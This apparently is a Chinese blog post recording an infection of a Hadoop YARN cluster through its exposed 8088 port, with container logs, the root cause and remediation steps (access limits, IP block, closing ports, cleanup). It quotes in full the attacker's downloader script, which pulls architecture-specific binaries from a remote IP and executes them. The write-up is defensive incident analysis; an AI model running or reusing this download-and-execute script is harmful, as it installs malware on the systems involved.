89 75064 89 67377 0 0 20913 0 0:00:03 0:00:03 --:--:-- 20918
100 75064 100 75064 0 0 21980 0 0:00:03 0:00:03 --:--:-- 21987
chmod: changing permissions of ‘agent.sock’: Operation not permitted
chmod: changing permissions of ‘ansible_ping_payload_tHqv_K’: Operation not permitted
chmod: changing permissions of ‘ss.txt’: Operation not permitted
chmod: changing permissions of ‘systemd-private-beeaf0028ab84544b3dd246d21ad9540-chronyd.service-e8aPai’: Operation not permitted
jack5tr.sh: line 9: ./RUN: cannot execute binary file
--2023-03-21 09:49:57-- http://199.195.250.172/arm7
Connecting to 199.195.250.172:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 146122 (143K)
Saving to: ‘arm7.1’
0K .......... .......... .......... .......... .......... 35% 28.2K 3s
50K .......... .......... .......... .......... .......... 70% 24.9K 2s
100K .......... .......... .......... .......... .. 100% 36.5K=4.9s
2023-03-21 09:50:02 (28.8 KB/s) - ‘arm7.1’ saved [146122/146122]
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
1 142k 1 2864 0 0 1984 0 0:01:13 0:00:01 0:01:12 1983
32 142k 32 46896 0 0 22865 0 0:00:06 0:00:02 0:00:04 22864
55 142k 55 80688 0 0 25198 0 0:00:05 0:00:03 0:00:02 25199
81 142k 81 115k 0 0 27269 0 0:00:05 0:00:04 0:00:01 27265
92 142k 92 131k 0 0 25621 0 0:00:05 0:00:05 --:--:-- 26719
100 142k 100 142k 0 0 24699 0 0:00:05 0:00:05 --:--:-- 32034
chmod: changing permissions of ‘agent.sock’: Operation not permitted
chmod: changing permissions of ‘ansible_ping_payload_tHqv_K’: Operation not permitted
chmod: changing permissions of ‘ss.txt’: Operation not permitted
chmod: changing permissions of ‘systemd-private-beeaf0028ab84544b3dd246d21ad9540-chronyd.service-e8aPai’: Operation not permitted
jack5tr.sh: line 10: ./RUN: cannot execute binary file
--2023-03-21 09:50:08-- http://199.195.250.172/ppc
Connecting to 199.195.250.172:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 58916 (58K)
Saving to: ‘ppc.1’
0K .......... .......... .......... .......... .......... 86% 32.6K 0s
50K ....... 100% 55.7M=1.5s
2023-03-21 09:50:10 (37.5 KB/s) - ‘ppc.1’ saved [58916/58916]
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
55 58916 55 32562 0 0 26251 0 0:00:02 0:00:01 0:00:01 26238
100 58916 100 58916 0 0 27582 0 0:00:02 0:00:02 --:--:-- 27582
100 58916 100 58916 0 0 27579 0 0:00:02 0:00:02 --:--:-- 27582
chmod: changing permissions of ‘agent.sock’: Operation not permitted
chmod: changing permissions of ‘ansible_ping_payload_tHqv_K’: Operation not permitted
chmod: changing permissions of ‘ss.txt’: Operation not permitted
chmod: changing permissions of ‘systemd-private-beeaf0028ab84544b3dd246d21ad9540-chronyd.service-e8aPai’: Operation not permitted
jack5tr.sh: line 11: ./RUN: cannot execute binary file
--2023-03-21 09:50:13-- http://199.195.250.172/spc
Connecting to 199.195.250.172:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 63096 (62K)
Saving to: ‘spc.1’
0K .......... .......... .......... .......... .......... 81% 14.5K 1s
50K .......... . 100% 67.1M=3.4s
2023-03-21 09:50:16 (17.9 KB/s) - ‘spc.1’ saved [63096/63096]
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
46 63096 46 29490 0 0 20733 0 0:00:03 0:00:01 0:00:02 20723
98 63096 98 62258 0 0 29114 0 0:00:02 0:00:02 --:--:-- 29106
100 63096 100 63096 0 0 21737 0 0:00:02 0:00:02 --:--:-- 21734
chmod: changing permissions of ‘agent.sock’: Operation not permitted
chmod: changing permissions of ‘ansible_ping_payload_tHqv_K’: Operation not permitted
chmod: changing permissions of ‘ss.txt’: Operation not permitted
chmod: changing permissions of ‘systemd-private-beeaf0028ab84544b3dd246d21ad9540-chronyd.service-e8aPai’: Operation not permitted
jack5tr.sh: line 12: ./RUN: cannot execute binary file
--2023-03-21 09:50:19-- http://199.195.250.172/m68k
Connecting to 199.195.250.172:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 65384 (64K)
Saving to: ‘m68k.1’
0K .......... .......... .......... .......... .......... 78% 46.2K 0s
50K .......... ... 100% 64.4K=1.3s
2023-03-21 09:50:21 (49.2 KB/s) - ‘m68k.1’ saved [65384/65384]
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
10 65384 10 6962 0 0 15456 0 0:00:04 --:--:-- 0:00:04 15436
71 65384 71 46898 0 0 24808 0 0:00:02 0:00:01 0:00:01 24800
100 65384 100 65384 0 0 25532 0 0:00:02 0:00:02 --:--:-- 25530
100 65384 100 65384 0 0 25530 0 0:00:02 0:00:02 --:--:-- 25530
chmod: changing permissions of ‘agent.sock’: Operation not permitted
chmod: changing permissions of ‘ansible_ping_payload_tHqv_K’: Operation not permitted
chmod: changing permissions of ‘ss.txt’: Operation not permitted
chmod: changing permissions of ‘systemd-private-beeaf0028ab84544b3dd246d21ad9540-chronyd.service-e8aPai’: Operation not permitted
jack5tr.sh: line 13: ./RUN: cannot execute binary file
--2023-03-21 09:50:24-- http://199.195.250.172/sh4
Connecting to 199.195.250.172:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 54644 (53K)
Saving to: ‘sh4.1’
0K .......... .......... .......... .......... .......... 93% 25.7K 0s
50K ... 100% 4.81K=2.6s
2023-03-21 09:50:27 (20.2 KB/s) - ‘sh4.1’ saved [54644/54644]
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
31 54644 31 17202 0 0 25087 0 0:00:02 --:--:-- 0:00:02 25075
89 54644 89 48946 0 0 26410 0 0:00:02 0:00:01 0:00:01 26400
100 54644 100 54644 0 0 26359 0 0:00:02 0:00:02 --:--:-- 26372
chmod: changing permissions of ‘agent.sock’: Operation not permitted
chmod: changing permissions of ‘ansible_ping_payload_tHqv_K’: Operation not permitted
chmod: changing permissions of ‘ss.txt’: Operation not permitted
chmod: changing permissions of ‘systemd-private-beeaf0028ab84544b3dd246d21ad9540-chronyd.service-e8aPai’: Operation not permitted
jack5tr.sh: line 14: ./RUN: cannot execute binary file
/bin/bash: tftp: command not found
chmod: cannot access ‘jack5tr2.sh’: No such file or directory
sh: jack5tr2.sh: No such file or directory
/bin/bash: ftpget: command not found
sh: jack5tr1.sh: No such file or directory
rm: cannot remove ‘agent.sock’: Operation not permitted
rm: cannot remove ‘ansible_ping_payload_tHqv_K’: Operation not permitted
rm: cannot remove ‘ss.txt’: Operation not permitted
rm: cannot remove ‘systemd-private-beeaf0028ab84544b3dd246d21ad9540-chronyd.service-e8aPai’: Operation not permitted
at org.apache.hadoop.util.Shell.runCommand(Shell.java:538)
at org.apache.hadoop.util.Shell.run(Shell.java:455)
at org.apache.hadoop.util.Shell$ShellCommandExecutor.execute(Shell.java:702)
at org.apache.hadoop.yarn.server.nodemanager.DefaultContainerExecutor.launchContainer(DefaultContainerExecutor.java:197)
at org.apache.hadoop.yarn.server.nodemanager.containermanager.launcher.ContainerLaunch.call(ContainerLaunch.java:299)
at org.apache.hadoop.yarn.server.nodemanager.containermanager.launcher.ContainerLaunch.call(ContainerLaunch.java:81)
at java.util.concurrent.FutureTask.run(FutureTask.java:266)
at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
at java.lang.Thread.run(Thread.java:750)
Shell output: done.
done.
done.
done.
done.
done.
done.
Container exited with a non-zero exit code 1
.Failing this attempt.. Failing the application.

通过日志发现,从http://199.195.250.172/jack5tr.sh 下载脚本并执行;

通过windows下载直接报病毒,

通过centos  wget http://199.195.250.172/jack5tr.sh  下载查看文件


#!/bin/bash
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://199.195.250.172/x86; curl -O http://199.195.250.172/x86;cat x86 >RUN;chmod +x *;./RUN x86
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://199.195.250.172/mips; curl -O http://199.195.250.172/mips;cat mips >RUN;chmod +x *;./RUN mips
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://199.195.250.172/arc; curl -O http://199.195.250.172/arc;cat arc >RUN;chmod +x *;./RUN arc
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://199.195.250.172/x86_64; curl -O http://199.195.250.172/x86_64;cat x86_64 >RUN;chmod +x *;./RUN x86_64
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://199.195.250.172/mpsl; curl -O http://199.195.250.172/mpsl;cat mpsl >RUN;chmod +x *;./RUN mpsl
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://199.195.250.172/arm; curl -O http://199.195.250.172/arm;cat arm >RUN;chmod +x *;./RUN arm
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://199.195.250.172/arm5; curl -O http://199.195.250.172/arm5;cat arm5 >RUN;chmod +x *;./RUN arm5
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://199.195.250.172/arm6; curl -O http://199.195.250.172/arm6;cat arm6 >RUN;chmod +x *;./RUN arm6
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://199.195.250.172/arm7; curl -O http://199.195.250.172/arm7;cat arm7 >RUN;chmod +x *;./RUN arm7
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://199.195.250.172/ppc; curl -O http://199.195.250.172/ppc;cat ppc >RUN;chmod +x *;./RUN ppc
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://199.195.250.172/spc; curl -O http://199.195.250.172/spc;cat spc >RUN;chmod +x *;./RUN spc
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://199.195.250.172/m68k; curl -O http://199.195.250.172/m68k;cat m68k >RUN;chmod +x *;./RUN m68k
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://199.195.250.172/sh4; curl -O http://199.195.250.172/sh4;cat sh4 >RUN;chmod +x *;./RUN sh4

脚本继续下载病毒病执行。

从任务提交入手,查看nginx日志;

 分别在9:27 与9:39分通过暴漏的hadoop 的8088端口域名通过python成型提交两个任务,和yarn的任务执行时间一致。

找到源头,那么执行如下方案:

1、暴漏hadoop8088端口的域名,做访问限制,仅限公司内外访问;外网无法访问

 

2、封掉199.195.250.172,从内网无法下载该ip的所有文件

3、禁止hadoop 暴漏在公网下其他端口,8020,50070。

4、查杀目前集群上的病毒;

持续观察几天,理论上限制了入口后,外部无法提交任务。基本可以根治。

日常问题系列——yarn web ui提供kill application功能;登录用户为dr.who,无法查看application运行情况
njuptcyd的博客
05-10 4433
问题一、yarn web ui界面没有办法查看application具体运行情况 Yarn Web UI界面效果如下: 点击一个running 状态的application,会显示如下信息: You (User dr.who) are not authorized to view application application_1557385812521_0002 原因及解决方法 dr.who...
挖矿病毒清除记录
ufsoko的博客
11-27 1009
挖矿病毒清除记录出现现象查看定时任务开始解决目前还存在三个问题: 出现现象 cpu是4核的但使用htop无法查看到,之前跑的服务进程都被kill掉了,重新启动服务依然被kill掉。 查看定时任务 crontab -l 会出现如下这些curl请求一个域名里面的数据并且下载脚本只需,清除之后还是会存在。 开始解决 于是乎我先把/etc/hosts 加上了一个 127.0.0.1 aliyun.on...
Linux下wget返回404 Not Found问题的解决
phmatthaus的专栏
04-21 2万+
运行wget命令下载资源是出现了“HTTP request sent, awaiting response... 404 Not Found”错误,详细如下所示: # wget https://launchpad.net/ubuntu/+source/linux/4.15.0-45.48/linux_4.15.0.orig.tar.gz --2022-04-21 09:59:25-- https://launchpad.net/ubuntu/+source/linux/4.15.0-45.48/lin
在linux下 wget 下载报错 http request sent,awaiting response... 404 not found
不忘的博客
07-24 1万+
linux上没有安装FTP工具,因此想用wget命令来下载本机上的文件 我用IIS映射了一个网站地址,然后把文件放在这个网站目录上 注意:IIS地址网站绑定的IP地址不能填写127.0.0.1,而是要填192.168.xx.xx 不然的话会出现HTTP request sent, awaiting response… 400 Bad Request的错误 然后随便取个域名,配置下hosts文件 www.xxxx.com 192.168.xx.xx 关闭防火墙 进入linux,修改etc/host
清除挖矿病毒solr记录
flye的专栏
02-20 1716
solr病毒cpu占用100%,导致node节点挂掉,正常情况下,一般node节点不会挂掉,进入节点,发现果然node挂掉。
confluence挖矿病毒(kdevtmpfsi 、solrd)解决
lin351550660的专栏
01-12 3883
自己安装了conference,没用1周。发现服务器内存被吃完了。 定位问题: 1、之前就听说过confluence 有漏洞 攻击者会利用confluence编辑页面的某个参数进行写入攻击。所以直接在百度搜索:confluence挖矿病毒 2、感谢https://www.cnblogs.com/hack404/p/11464890.html作者的帮助。 处理过程: 1. 先封掉外网HTTP 端口 使用腾讯云控制台 安全组 设置80端口不允许访问。 2. 查杀进程 使用命令:top 查..
【实战】记录一次服务器挖矿病毒处理
weixin_45694388的博客
07-25 1883
信息收集及kill: 查看监控显示长期CPU利用率超高,怀疑中了病毒 top 命令查看进程资源占用: netstat -lntupa 命令查看有无ip进行发包 netstat -antp 然而并没有找到对应的进程名 查看java进程和solr进程 ps aux :查看所有进程 除相关进程:kill -9(无条件退出进程) 为了防止有定时任务,再次启动恶意进程 crontab -l 命令查看正在进行中的定时任务 crontab -r 删除所有定时任务 居然没有???? 保存样本,删除
使用cursorMark做深度分页来解决solr普通分页时查询效率低的问题-jmeter、solr
junior77的专栏
08-17 760
cursorMark深度分页 VS solr普通分页
solrsolr-9.0.0.tgz)
06-02
Solr,全称为Apache Solr,是Apache软件基金会的一个开源项目,主要用来处理全文搜索和企业级的搜索应用。它基于Java,利用Lucene库构建,提供了高效、可扩展的搜索和导航功能。Solr-9.0.0是该软件的最新版本,此...
记录清除挖矿病毒 solrd 过程
爱摄影的小章同学的博客
06-12 919
删除完成发现 所有进程都不见了,此时吓懵了,因为是现网,产线还有很多消息正在往kafka里写数据,。端午节期间,kafka 服务器被黑客攻击了,植入了挖矿病毒 solrd,这个病毒很聪明,内存,CPU并没有异常升高,以致于上班第一天完全没有察觉。此时看到消费kafka 服务都还在,没有注意到第一行的 /tmp/.solr/solrd 病毒,此时它还没有占用多少CPU跟内存。刚kill 完成 再次top -c 发现这个病毒有换了一个进程的id 又起来了,试了几次都没用,于是 查到病毒执行的文件夹。
linux服务器 kdevtmpfsi solrd 病毒处理 记住一定要多删除几次。重启
Super_man54188的博客
02-20 1380
所有中病毒 无非是cpu内存占用高 一定要断公网地址 修改root密码 删除history历史记录 history -c 映射端口也要注意 solrd病毒 公司服务器负载突然上来了,用top命令查看,发现了一个很诡异的进程 然后grep这个进程的进程号,发现是运行在/tmp/.solr/solrd下;于是赶紧杀进程,删程序,负载就下来了;但是还没有完,用top命令再次查看的时候惊...
挖矿病毒清理记录(隐藏进程处理)病毒特征二
深耕AI领域,专注中、高人工智能领域发展;同步研究电磁学及超导材料、量子力学;关注能源发展和技术,同时进行医学创新
05-27 397
挖矿病毒清理记录(隐藏进程处理)病毒特征二
Apache Solr 8.1.1和8.2.0版本 JMX服务远程代码执行漏洞(CVE-2019-12409)
weixin_44047654的博客
02-14 972
Apache Solr 8.1.1和8.2.0版本 JMX服务远程代码执行漏洞(CVE-2019-12409)
HTTP request sent, awaiting response... 404 Not Found
热门推荐
lixiaotaoplus的专栏
03-02 3万+
背景: 某日数据上报任务中,出现:“HTTP request sent, awaiting response... 404 Not Found”异常。 日志如下: 任务ID:xxx开始执行,执行命令:edw/etl/xx.py 125_yyyymmdd_done.txt wireless_order_deal_5min  --2015-02-27 08:56:09-- http://
Ubuntu安装singularity报错记录
qajhdj的博客
05-18 4311
需要用singularity执行nextflow命令
虚拟机Linux - HTTP request sent, awaiting response... 404 Not Found
Ginny_2019的博客
06-19 8042
错误信息: [root@localhost src]# wget http://apache.01link.hk/kafka/2.0.0/kafka_2.11-2.0.0.tgz --2019-06-18 22:15:11-- http://apache.01link.hk/kafka/2.0.0/kafka_2.11-2.0.0.tgz Resolving apache.01link.hk ...
wget下载报错 : wget HTTP request sent, awaiting response... 403 Forbidden
king_ham的博客
07-02 2127
使用wget命令下载报错。
为什么使用网络请求时,遇到 HTTP 请求返回 404(Not Found)错误,而使用 HTTPS 请求则正常工作
最新发布
LLZjiayou的博客
08-21 1万+
当你在HTTP请求时遇到404错误,而HTTPS服务器配置问题,导致HTTP请求无法找到资源或未正确重定向。服务端强制资源只能通过HTTPS访问。安全策略、虚拟主机配置、防火墙、CDN 或缓存等因素也可能影响HTTP请求。最佳实践是始终使用HTTPS进行通信,以确保数据的安全性和兼容性。如果你有更多问题或具体的应用场景,欢迎进一步讨论!
Hadoop漏洞被传挖矿病毒(/tmp/kdevtmpfsi kinsing)
lucas5的博客
12-21 489
大数据服务器,被病毒挖矿
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

冰帆<

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值